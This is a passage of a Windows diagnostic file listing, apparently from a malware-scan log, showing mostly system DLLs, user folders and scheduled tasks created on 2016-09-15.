C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinelsa.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncPolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00079536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00077664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00073568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncPolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00062816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057400 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AddressParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00044472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00041824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceassociation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\encapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\delegatorprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi_passthru.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_IS2022.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\c_GSM7.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosTrace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spwmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosHost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccessRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx 2016-09-15 05:01 - 2016-09-15 05:01 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdxm.ocx 2016-09-15 05:01 - 2016-09-15 05:01 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxmasf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneutilRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlStringsRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll 2016-09-15 04:59 - 2016-09-15 04:59 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2016-09-15 04:59 - 2016-09-15 01:04 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2016-09-15 04:59 - 2016-07-15 23:58 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DxToolsReportGenerator.dll 2016-09-15 04:59 - 2016-07-15 23:28 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsProxyStub.dll 2016-09-15 04:59 - 2016-07-15 23:28 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARP12Debug.dll 2016-09-15 04:59 - 2016-07-15 23:26 - 00376320 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DXCpl.exe 2016-09-15 04:59 - 2016-07-15 23:26 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARPDebug.dll 2016-09-15 04:59 - 2016-07-15 23:25 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXGIDebug.dll 2016-09-15 04:59 - 2016-07-15 23:23 - 14388224 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCaptureReplay.dll 2016-09-15 04:59 - 2016-07-15 23:22 - 00429056 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1debug3.dll 2016-09-15 04:59 - 2016-07-15 23:22 - 00355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\perf_gputiming.dll 2016-09-15 04:59 - 2016-07-15 23:19 - 01323520 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11_3SDKLayers.dll 2016-09-15 04:59 - 2016-07-15 23:16 - 05850624 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe 2016-09-15 04:59 - 2016-07-15 23:16 - 04969472 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsRemoteEngine.exe 2016-09-15 04:59 - 2016-07-15 23:15 - 06582784 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12warp.dll 2016-09-15 04:59 - 2016-07-15 23:13 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsOfflineAnalysis.dll 2016-09-15 04:59 - 2016-07-15 23:13 - 01198592 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCap.exe 2016-09-15 04:59 - 2016-07-15 23:13 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsCapture.dll 2016-09-15 04:59 - 2016-07-15 23:12 - 00297984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsExperiment.dll 2016-09-15 04:59 - 2016-07-15 23:12 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsMonitor.dll 2016-09-15 04:59 - 2016-07-15 23:11 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsReporting.dll 2016-09-15 04:59 - 2016-07-15 22:58 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DxToolsReportGenerator.dll 2016-09-15 04:59 - 2016-07-15 22:44 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsProxyStub.dll 2016-09-15 04:59 - 2016-07-15 22:43 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARP12Debug.dll 2016-09-15 04:59 - 2016-07-15 22:42 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARPDebug.dll 2016-09-15 04:59 - 2016-07-15 22:41 - 00355840 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DXCpl.exe 2016-09-15 04:59 - 2016-07-15 22:41 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXGIDebug.dll 2016-09-15 04:59 - 2016-07-15 22:39 - 11670528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCaptureReplay.dll 2016-09-15 04:59 - 2016-07-15 22:38 - 00371712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1debug3.dll 2016-09-15 04:59 - 2016-07-15 22:37 - 01074176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11_3SDKLayers.dll 2016-09-15 04:59 - 2016-07-15 22:35 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perf_gputiming.dll 2016-09-15 04:59 - 2016-07-15 22:32 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe 2016-09-15 04:59 - 2016-07-15 22:32 - 03701248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsRemoteEngine.exe 2016-09-15 04:59 - 2016-07-15 22:31 - 04977664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12warp.dll 2016-09-15 04:59 - 2016-07-15 22:29 - 00953344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCap.exe 2016-09-15 04:59 - 2016-07-15 22:29 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsExperiment.dll 2016-09-15 04:59 - 2016-07-15 22:29 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsCapture.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 01509888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsOfflineAnalysis.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsMonitor.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsReporting.dll 2016-09-15 04:58 - 2016-09-15 04:58 - 00199008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys 2016-09-15 03:30 - 2016-09-19 13:02 - 00000000 ____D C:\Users\GImagineG\Documents\Bulls announce 2016-17 Television Schedule _ Chicago Bulls_files 2016-09-15 03:30 - 2016-09-15 03:30 - 00135491 _____ C:\Users\GImagineG\Documents\Bulls announce 2016-17 Television Schedule _ Chicago Bulls.htm 2016-09-15 03:25 - 2016-09-15 03:27 - 00025088 _____ C:\Users\GImagineG\Documents\Chicago Vulls Schedule.xls 2016-09-15 02:04 - 2016-09-15 02:04 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2016-09-15 02:03 - 2016-09-15 02:03 - 00000000 ____D C:\Users\GImagineG\AppData\Local\ConnectedDevicesPlatform 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\My Documents 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Videos 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Music 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Music 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 ____D C:\ProgramData\USOShared 2016-09-15 01:15 - 2016-09-15 01:15 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2016-09-15 01:15 - 2016-09-15 01:15 - 00007623 _____ C:\WINDOWS\diagerr.xml 2016-09-15 01:14 - 2016-09-19 15:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-09-15 01:14 - 2016-09-15 01:14 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat 2016-09-15 01:14 - 2016-09-15 01:14 - 00003454 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2016-09-15 01:14 - 2016-09-15 01:14 - 00003432 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1469256672 2016-09-15 01:14 - 2016-09-15 01:14 - 00003392 _____ C:\WINDOWS\System32\Tasks\SUPERAntiSpyware Scheduled Task bdd463d5-961f-4895-aa8b-12fed1956349 2016-09-15 01:14 - 2016-09-15 01:14 - 00003326 _____ C:\WINDOWS\System32\Tasks\SUPERAntiSpyware Scheduled Task 9c97e707-2f6a-49fa-9c39-bf57a7fce1cb 2016-09-15 01:14 - 2016-09-15 01:14 - 00003316 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6149F0C1-0742-44DD-A521-14C41333BEE7} 2016-09-15 01:14 - 2016-09-15 01:14 - 00003230 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2016-09-15 01:14 - 2016-09-15 01:14 - 00002954 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task 2016-09-15 01:14 - 2016-09-15 01:14 - 00002672 _____ C:\WINDOWS\System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002654 _____ C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002552 _____ C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002494 _____ C:\WINDOWS\System32\Tasks\RealDownloader Update Check 2016-09-15 01:14 - 2016-09-15 01:14 - 00002162 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC 2016-09-15 01:14 - 2016-09-15 01:14 - 00000020 ___SH C:\Users\GImagineG\ntuser.ini 2016-09-15 01:13 - 2016-09-15 01:13 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2008 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2005 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2008 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2005 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help 2016-09-15 01:06 - 2016-07-16 07:41 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2016-09-15 01:05 - 2016-09-19 13:03 - 00000000 ____D C:\Users\GImagineG 2016-09-15 01:05 - 2016-09-15 01:13 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\My Documents 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Videos 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Pictures 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Music 2016-09-15 01:04 - 2016-09-19 18:58 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-09-15 01:04 - 2016-09-19 15:22 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-09-15 01:04 - 